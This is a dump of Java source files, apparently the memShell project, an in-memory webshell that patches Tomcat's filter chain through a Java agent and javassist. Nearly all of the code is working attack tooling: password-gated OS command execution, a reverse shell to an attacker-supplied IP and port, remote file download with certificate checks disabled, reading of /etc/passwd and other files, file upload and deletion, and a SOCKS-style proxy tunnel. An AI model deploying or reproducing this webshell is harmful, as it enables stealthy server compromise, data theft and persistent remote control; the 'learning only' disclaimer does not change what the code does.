84 | MyServletInputStream.read(ins, buff, 0, readlen);
85 | ByteBuffer buf = ByteBuffer.allocate(readlen);
86 | buf.clear();
87 | buf.put(buff);
88 | buf.flip();
89 |
90 | while (buf.hasRemaining()) {
91 | socketChannel.write(buf);
92 | }
93 | MyResponse.setHeader(response, "X-STATUS", "OK");
94 | // response.getOutputStream().close();
95 |
96 | } catch (Exception e) {
97 | System.out.println(e.getMessage());
98 | MyResponse.setHeader(response, "X-ERROR", e.getMessage());
99 | MyResponse.setHeader(response, "X-STATUS", "FAIL");
100 | socketChannel.socket().close();
101 | }
102 | }
103 | } else {
104 | // PrintWriter o = response.getWriter();
105 | // out.print("Georg says, 'All seems fine'");
106 | MyResponse.getWriter(response).print("Georg says, 'All seems fine'");
107 | }
108 | }
109 | }
110 |
--------------------------------------------------------------------------------
/src/net/rebeyond/memshell/Shell.java:
--------------------------------------------------------------------------------
1 | package net.rebeyond.memshell;
2 | import java.io.BufferedReader;
3 | import java.io.BufferedWriter;
4 | import java.io.DataInputStream;
5 | import java.io.DataOutputStream;
6 | import java.io.File;
7 | import java.io.FileInputStream;
8 | import java.io.FileNotFoundException;
9 | import java.io.FileOutputStream;
10 | import java.io.FileReader;
11 | import java.io.IOException;
12 | import java.io.InputStream;
13 | import java.io.InputStreamReader;
14 | import java.io.OutputStream;
15 | import java.io.OutputStreamWriter;
16 | import java.io.PrintWriter;
17 | import java.lang.reflect.Method;
18 | import java.net.HttpURLConnection;
19 | import java.net.Socket;
20 | import java.net.URL;
21 | import java.net.URLConnection;
22 | import java.security.cert.CertificateException;
23 | import java.util.Base64;
24 |
25 | import javax.net.ssl.HostnameVerifier;
26 | import javax.net.ssl.HttpsURLConnection;
27 | import javax.net.ssl.SSLContext;
28 | import javax.net.ssl.SSLSession;
29 | import javax.net.ssl.TrustManager;
30 | import javax.net.ssl.X509TrustManager;
31 | import javax.security.cert.X509Certificate;
32 | import javax.servlet.ServletContext;
33 | import javax.servlet.ServletException;
34 | import javax.servlet.ServletOutputStream;
35 | import javax.servlet.ServletRequest;
36 | import javax.servlet.ServletResponse;
37 | import javax.servlet.http.HttpSession;
38 |
39 | public class Shell {
40 |
41 | public static String execute(String cmd) throws Exception {
42 | String result = "";
43 | if (cmd != null && cmd.length() > 0) {
44 |
45 | Process p = Runtime.getRuntime().exec(cmd);
46 | OutputStream os = p.getOutputStream();
47 | InputStream in = p.getInputStream();
48 | DataInputStream dis = new DataInputStream(in);
49 | String disr = dis.readLine();
50 | while (disr != null) {
51 | result = result + disr + "\n";
52 | disr = dis.readLine();
53 | }
54 | }
55 | return result;
56 | }
57 |
58 | public static String connectBack(String ip, String port) throws Exception {
59 | class StreamConnector extends Thread {
60 | InputStream sp;
61 | OutputStream gh;
62 |
63 | StreamConnector(InputStream sp, OutputStream gh) {
64 | this.sp = sp;
65 | this.gh = gh;
66 | }
67 |
68 | public void run() {
69 | BufferedReader xp = null;
70 | BufferedWriter ydg = null;
71 | try {
72 | xp = new BufferedReader(new InputStreamReader(this.sp));
73 | ydg = new BufferedWriter(new OutputStreamWriter(this.gh));
74 | char buffer[] = new char[8192];
75 | int length;
76 | while ((length = xp.read(buffer, 0, buffer.length)) > 0) {
77 | ydg.write(buffer, 0, length);
78 | ydg.flush();
79 | }
80 | } catch (Exception e) {
81 | }
82 | try {
83 | if (xp != null)
84 | xp.close();
85 | if (ydg != null)
86 | ydg.close();
87 | } catch (Exception e) {
88 | }
89 | }
90 | }
91 | try {
92 | String ShellPath;
93 | if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {
94 | ShellPath = new String("/bin/sh");
95 | } else {
96 | ShellPath = new String("cmd.exe");
97 | }
98 |
99 | Socket socket = new Socket(ip, Integer.parseInt(port));
100 | Process process = Runtime.getRuntime().exec(ShellPath);
101 | (new StreamConnector(process.getInputStream(), socket.getOutputStream())).start();
102 | (new StreamConnector(socket.getInputStream(), process.getOutputStream())).start();
103 | return "Successful!";
104 | } catch (Exception e) {
105 | return e.getMessage();
106 | }
107 | }
108 |
109 | public static String help() {
110 | return "Webshell in Memory:\n\n" + "Usage:\n" + "anyurl?pwd=pass //show this help page.\n"
111 | + "anyurl?pwd=pass&model=exec&cmd=whoami //run os command.\n"
112 | + "anyurl?pwd=pass&model=connectback&ip=8.8.8.8&port=51 //reverse a shell back to 8.8.8.8 on port 51.\n"
113 | + "anyurl?pwd=pass&model=urldownload&url=http://xxx.com/test.pdf&path=/tmp/test.pdf //download a remote file via the victim's network directly.\n"
114 | + "anyurl?pwd=pass&model=list[del|show]&path=/etc/passwd //list,delete,show the specified path or file.\n"
115 | + "anyurl?pwd=pass&model=download&path=/etc/passwd //download the specified file on the victim's disk.\n"
116 | + "anyurl?pwd=pass&model=upload&path=/tmp/a.elf&content=this_is_content[&type=b] //upload a text file or a base64 encoded binary file to the victim's disk.\n"
117 | + "anyurl?pwd=pass&model=proxy //start a socks proxy server on the victim.\n"
118 | + "anyurl?pwd=pass&model=chopper //start a chopper server agent on the victim.\n\n"
119 | + "For learning exchanges only, do not use for illegal purposes.by rebeyond.\n";
120 | }
121 |
122 | public static String list(String path) {
123 | String result = "";
124 | File f = new File(path);
125 | if (f.isDirectory()) {
126 | for (File temp : f.listFiles()) {
127 | if (temp.isFile()) {
128 | result = result + (temp.isDirectory()?"r":"-") + " " + temp.getName() + " " + temp.length() + "\n";
129 | }
130 | else {
131 | result = result + (temp.isDirectory()?"r":"-")+ " " + temp.getName() + " " + temp.length() + "\n";
132 | }
133 | }
134 | } else {
135 | result = result + f.isDirectory() + " " + f.getName() + " " + f.length() + "\n";
136 | }
137 | return result;
138 | }
139 | public static String delete(String path) {
140 | String result = "";
141 | File f = new File(path);
142 | if (f.isDirectory()) {
143 | result = deleteDir(f)?"delete directory "+path+" successfully.":"delete "+path+" failed(maybe only some files are not deleted).";
144 | } else {
145 | result = f.delete()?"delete "+path+" successfully.":"delete "+path+" failed.";
146 | }
147 | return result;
148 | }
149 | public static String showFile(String path) throws Exception {
150 | StringBuffer result= new StringBuffer();
151 | File f = new File(path);
152 | if (f.exists()&&f.isFile()) {
153 | FileReader reader = new FileReader(f);
154 | BufferedReader br = new BufferedReader(reader);
155 | String str = null;
156 | while((str = br.readLine()) != null) {
157 | result.append(str+"\n");
158 | }
159 | br.close();
160 | reader.close();
161 | }
162 | return result.toString();
163 | }
164 | private static boolean deleteDir(File dir){
165 | boolean result=true;
166 | if(dir.isDirectory()){
167 | File[] files = dir.listFiles();
168 | for(int i=0; i 0)
193 | response.getOutputStream().write(b, 0, len);
194 | inStream.close();
195 | } catch (IOException e) {
196 | e.printStackTrace();
197 | }
198 |
199 | }*/
200 |
201 | }
202 | public static String upload(String path,String fileContent,String type) throws Exception
203 | {
204 | FileOutputStream fos=new FileOutputStream(path);
205 | if (type.equalsIgnoreCase("a"))
206 | {
207 | fos.write(fileContent.getBytes());
208 | fos.flush();
209 | }
210 | else if(type.equalsIgnoreCase("b"))
211 | {
212 | fos.write(Base64.getDecoder().decode(fileContent));
213 | }
214 | fos.close();
215 | return "file " + path + " is upload successfully,and size is " + new File(path).length() + " Byte.";
216 | }
217 |
218 | public static String urldownload(String url, String path) throws Exception {
219 | SSLContext sslcontext = SSLContext.getInstance("SSL", "SunJSSE");
220 | sslcontext.init(null, new TrustManager[] { new X509TrustManager() {
221 |
222 | @Override
223 | public void checkClientTrusted(java.security.cert.X509Certificate[] arg0, String arg1)
224 | throws CertificateException {
225 | // TODO Auto-generated method stub
226 |
227 | }
228 |
229 | @Override
230 | public void checkServerTrusted(java.security.cert.X509Certificate[] arg0, String arg1)
231 | throws CertificateException {
232 | // TODO Auto-generated method stub
233 |
234 | }
235 |
236 | @Override
237 | public java.security.cert.X509Certificate[] getAcceptedIssuers() {
238 | // TODO Auto-generated method stub
239 | return null;
240 | }
241 |
242 | } }, new java.security.SecureRandom());
243 | // URL url = new URL(url);
244 | HostnameVerifier ignoreHostnameVerifier = new HostnameVerifier() {
245 | public boolean verify(String s, SSLSession sslsession) {
246 | return true;
247 | }
248 | };
249 | HttpURLConnection urlCon;
250 | URL downloadUrl=new URL(url);
251 | HttpsURLConnection.setDefaultHostnameVerifier(ignoreHostnameVerifier);
252 | HttpsURLConnection.setDefaultSSLSocketFactory(sslcontext.getSocketFactory());
253 | urlCon = (HttpsURLConnection) downloadUrl.openConnection();
254 | urlCon.setConnectTimeout(6000);
255 | urlCon.setReadTimeout(6000);
256 | int code = urlCon.getResponseCode();
257 | if (code != HttpURLConnection.HTTP_OK) {
258 | throw new Exception("文件读取失败");
259 | }
260 | // 读文件流
261 | DataInputStream in = new DataInputStream(urlCon.getInputStream());
262 | DataOutputStream out = new DataOutputStream(new FileOutputStream(path));
263 | byte[] buffer = new byte[2048];
264 | int count = 0;
265 | while ((count = in.read(buffer)) > 0) {
266 | out.write(buffer, 0, count);
267 | out.flush();
268 | }
269 | out.close();
270 | in.close();
271 | return "file " + path + " downloaded successfully,and size is " + new File(path).length() + " Byte.";
272 | }
273 |
274 | public static void main(String[] args) {
275 | try {
276 | // System.out.println(Shell.execute("net user").replace("\n", "aaaaaaaaaaa"));
277 | } catch (Exception e) {
278 | // TODO Auto-generated catch block
279 | e.printStackTrace();
280 | }
281 | }
282 |
283 | public static void eval(ServletRequest request, ServletResponse response) throws Exception {
284 | /*
285 | * Class c=Class.forName("javax/servlet/ServletRequest");
286 | * System.out.println("classs is :"+c); Evaluate eval=new Evaluate();
287 | * eval.doGet(request, response);
288 | */
289 | }
290 | }
291 |
--------------------------------------------------------------------------------
/src/net/rebeyond/memshell/Transformer.java:
--------------------------------------------------------------------------------
1 | package net.rebeyond.memshell;
2 | import java.io.BufferedReader;
3 | import java.io.File;
4 | import java.io.FileReader;
5 | import java.io.InputStream;
6 | import java.io.InputStreamReader;
7 | import java.lang.instrument.ClassFileTransformer;
8 | import java.lang.instrument.IllegalClassFormatException;
9 | import java.security.ProtectionDomain;
10 |
11 | import javassist.ClassClassPath;
12 | import javassist.ClassPool;
13 | import javassist.CtClass;
14 | import javassist.CtMethod;
15 |
16 | public class Transformer implements ClassFileTransformer{
17 | @Override
18 | public byte[] transform(ClassLoader classLoader, String s, Class> aClass, ProtectionDomain protectionDomain, byte[] bytes) throws IllegalClassFormatException {
19 |
20 |
21 | if ("org/apache/catalina/core/ApplicationFilterChain".equals(s)) {
22 | try {
23 | ClassPool cp = ClassPool.getDefault();
24 | ClassClassPath classPath = new ClassClassPath(aClass); //get current class's classpath
25 | cp.insertClassPath(classPath); //add the classpath to classpool
26 | CtClass cc = cp.get("org.apache.catalina.core.ApplicationFilterChain");
27 | CtMethod m = cc.getDeclaredMethod("internalDoFilter");
28 | m.addLocalVariable("elapsedTime", CtClass.longType);
29 | m.insertBefore(readSource());
30 | byte[] byteCode = cc.toBytecode();
31 | cc.detach();
32 | return byteCode;
33 | } catch (Exception ex) {
34 | ex.printStackTrace();
35 | System.out.println("error:::::"+ex.getMessage());
36 | }
37 | }
38 |
39 | return null;
40 | }
41 | public String readSource() {
42 | StringBuilder source=new StringBuilder();
43 | InputStream is = Transformer.class.getClassLoader().getResourceAsStream("source.txt");
44 | InputStreamReader isr = new InputStreamReader(is);
45 | String line=null;
46 | try {
47 | BufferedReader br = new BufferedReader(isr);
48 | while((line=br.readLine()) != null) {
49 | source.append(line);
50 | }
51 | } catch (Exception e) {
52 | e.printStackTrace();
53 | }
54 | return source.toString();
55 | }
56 | }
57 |
--------------------------------------------------------------------------------
/src/net/rebeyond/memshell/redefine/MyRequest.java:
--------------------------------------------------------------------------------
1 | package net.rebeyond.memshell.redefine;
2 | import java.lang.reflect.InvocationTargetException;
3 |
4 | public class MyRequest {
5 | public static String getParameter(Object request,String name) throws Exception
6 | {
7 | return (String)request.getClass().getMethod("getParameter", String.class).invoke(request, name);
8 | }
9 | public static Object getServletContext(Object request) throws Exception
10 | {
11 | return request.getClass().getMethod("getServletContext", null).invoke(request, new Object[] {});
12 | }
13 | public static String getHeader(Object request,String name) throws Exception
14 | {
15 | return (String)request.getClass().getMethod("getHeader", String.class).invoke(request, name);
16 | }
17 |
18 | public static Object getSession(Object request) throws Exception
19 | {
20 | return request.getClass().getMethod("getSession", null).invoke(request, new Object[] {});
21 | }
22 | public static int getContentLength(Object request) throws Exception
23 | {
24 | return Integer.parseInt(request.getClass().getMethod("getContentLength", null).invoke(request, new Object[] {}).toString());
25 | }
26 |
27 | public static Object getInputStream(Object request) throws Exception
28 | {
29 | return request.getClass().getMethod("getInputStream", null).invoke(request, new Object[] {});
30 | }
31 | }
32 |
--------------------------------------------------------------------------------
/src/net/rebeyond/memshell/redefine/MyResponse.java:
--------------------------------------------------------------------------------
1 | package net.rebeyond.memshell.redefine;
2 | import java.io.PrintWriter;
3 | import java.lang.reflect.InvocationTargetException;
4 |
5 | public class MyResponse {
6 | public static void setContentType(Object response,String arg) throws Exception
7 | {
8 | response.getClass().getMethod("setContentType", String.class).invoke(response, arg);
9 | }
10 | public static void setCharacterEncoding(Object response,String arg) throws Exception
11 | {
12 | response.getClass().getMethod("setCharacterEncoding", String.class).invoke(response, arg);
13 | }
14 | public static PrintWriter getWriter(Object response) throws Exception
15 | {
16 | return (PrintWriter)response.getClass().getMethod("getWriter",null).invoke(response, new Object[] {});
17 | }
18 |
19 | public static void reset(Object response) throws Exception
20 | {
21 | response.getClass().getMethod("reset", null).invoke(response, new Object[] {});
22 | }
23 |
24 | public static Object getOutputStream(Object response) throws Exception
25 | {
26 | return response.getClass().getMethod("getOutputStream", null).invoke(response, new Object[] {});
27 | }
28 | public static void setHeader(Object response,String arg1,String arg2) throws Exception
29 | {
30 | response.getClass().getMethod("setHeader", String.class, String.class).invoke(response, arg1,arg2);
31 | }
32 |
33 | }
34 |
--------------------------------------------------------------------------------
/src/net/rebeyond/memshell/redefine/MyServletContext.java:
--------------------------------------------------------------------------------
1 | package net.rebeyond.memshell.redefine;
2 |
3 | public class MyServletContext {
4 | public static String getRealPath(Object servletContext ,String arg) throws Exception
5 | {
6 | return servletContext.getClass().getMethod("getRealPath", String.class).invoke(servletContext, arg).toString();
7 | }
8 | }
9 |
--------------------------------------------------------------------------------
/src/net/rebeyond/memshell/redefine/MyServletInputStream.java:
--------------------------------------------------------------------------------
1 | package net.rebeyond.memshell.redefine;
2 |
3 | public class MyServletInputStream {
4 | public static void read(Object servletInputStream ,byte[] a,int b,int c) throws Exception
5 | {
6 | servletInputStream.getClass().getMethod("read", byte[].class,int.class,int.class).invoke(servletInputStream, a,b,c);
7 | }
8 |
9 | }
10 |
--------------------------------------------------------------------------------
/src/net/rebeyond/memshell/redefine/MyServletOutputStream.java:
--------------------------------------------------------------------------------
1 | package net.rebeyond.memshell.redefine;
2 |
3 | public class MyServletOutputStream {
4 | public static void write(Object servletOutputStream ,byte[] a,int b,int c) throws Exception
5 | {
6 | servletOutputStream.getClass().getMethod("write", byte[].class,int.class,int.class).invoke(servletOutputStream, a,b,c);
7 | }
8 |
9 | public static void close(Object servletOutputStream ) throws Exception
10 | {
11 | servletOutputStream.getClass().getMethod("close",null).invoke(servletOutputStream,new Object[] {});
12 | }
13 |
14 | public static void flush(Object servletOutputStream ) throws Exception
15 | {
16 | servletOutputStream.getClass().getMethod("flush",null).invoke(servletOutputStream,new Object[] {});
17 | }
18 | }
19 |
--------------------------------------------------------------------------------
/src/net/rebeyond/memshell/redefine/MySession.java:
--------------------------------------------------------------------------------
1 | package net.rebeyond.memshell.redefine;
2 |
3 |
4 | public class MySession {
5 | public static void setAttribute(Object httpSession,String arg1,Object arg2) throws Exception
6 | {
7 | httpSession.getClass().getMethod("setAttribute",String.class,Object.class).invoke(httpSession, arg1,arg2);
8 | }
9 |
10 | public static Object getAttribute(Object httpSession,String arg1) throws Exception
11 | {
12 | return httpSession.getClass().getMethod("getAttribute",String.class).invoke(httpSession, arg1);
13 | }
14 |
15 |
16 | public static void invalidate(Object httpSession) throws Exception
17 | {
18 | httpSession.getClass().getMethod("invalidate",null).invoke(httpSession, new Object[] {});
19 | }
20 | }
21 |
--------------------------------------------------------------------------------
/src/other/forcedelete.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rebeyond/memShell/7ee1d62b2225cd01066f7b4effde4155932611d1/src/other/forcedelete.exe
--------------------------------------------------------------------------------
/src/source.txt:
--------------------------------------------------------------------------------
1 | javax.servlet.http.HttpServletRequest request=$1;
2 | javax.servlet.http.HttpServletResponse response = $2;
3 | String pass_the_world=request.getParameter("pass_the_world");
4 | String model=request.getParameter("model");
5 | String result="";
6 |
7 | try {
8 | if (pass_the_world!=null&&pass_the_world.equals(net.rebeyond.memshell.Agent.password))
9 | {
10 | if (model==null||model.equals(""))
11 | {
12 | result=net.rebeyond.memshell.Shell.help();
13 | }
14 | else if (model.equalsIgnoreCase("exec"))
15 | {
16 | String cmd=request.getParameter("cmd");
17 | result=net.rebeyond.memshell.Shell.execute(cmd);
18 | }
19 | else if (model.equalsIgnoreCase("connectback"))
20 | {
21 | String ip=request.getParameter("ip");
22 | String port=request.getParameter("port");
23 | result=net.rebeyond.memshell.Shell.connectBack(ip, port);
24 | }
25 | else if (model.equalsIgnoreCase("urldownload"))
26 | {
27 | String url=request.getParameter("url");
28 | String path=request.getParameter("path");
29 | result=net.rebeyond.memshell.Shell.urldownload(url, path);
30 | }
31 | else if (model.equalsIgnoreCase("list"))
32 | {
33 | String path=request.getParameter("path");
34 | result=net.rebeyond.memshell.Shell.list(path);
35 | }
36 | else if (model.equalsIgnoreCase("del"))
37 | {
38 | String path=request.getParameter("path");
39 | result=net.rebeyond.memshell.Shell.delete(path);
40 | }
41 | else if (model.equalsIgnoreCase("show"))
42 | {
43 | String path=request.getParameter("path");
44 | result=net.rebeyond.memshell.Shell.showFile(path);
45 | }
46 | else if (model.equalsIgnoreCase("download"))
47 | {
48 | String path=request.getParameter("path");
49 | java.io.File f = new java.io.File(path);
50 | if (f.isFile()) {
51 | String fileName = f.getName();
52 | java.io.InputStream inStream = new java.io.FileInputStream(path);
53 | response.reset();
54 | response.setContentType("bin");
55 | response.addHeader("Content-Disposition", "attachment; filename=\"" + fileName + "\"");
56 | byte[] b = new byte[100];
57 | int len;
58 | while ((len = inStream.read(b)) > 0)
59 | response.getOutputStream().write(b, 0, len);
60 | inStream.close();
61 | return;
62 |
63 | }
64 | }
65 | else if (model.equalsIgnoreCase("upload"))
66 | {
67 | String path=request.getParameter("path");
68 | String fileContent=request.getParameter("content");
69 | String type=request.getParameter("type");
70 | if (type==null||!type.equalsIgnoreCase("b"))
71 | type="a";
72 | result=net.rebeyond.memshell.Shell.upload(path, fileContent,type);
73 | }
74 | else if (model.equalsIgnoreCase("proxy"))
75 | {
76 | new net.rebeyond.memshell.Proxy().doProxy(request, response);
77 | return;
78 | }
79 | else if (model.equalsIgnoreCase("chopper"))
80 | {
81 | new net.rebeyond.memshell.Evaluate().doPost(request, response);
82 | return;
83 | }
84 | response.getWriter().print(result);
85 | return;
86 | }
87 |
88 | }
89 | catch(Exception e)
90 | {
91 | response.getWriter().print(e.getMessage());
92 | }
93 |
--------------------------------------------------------------------------------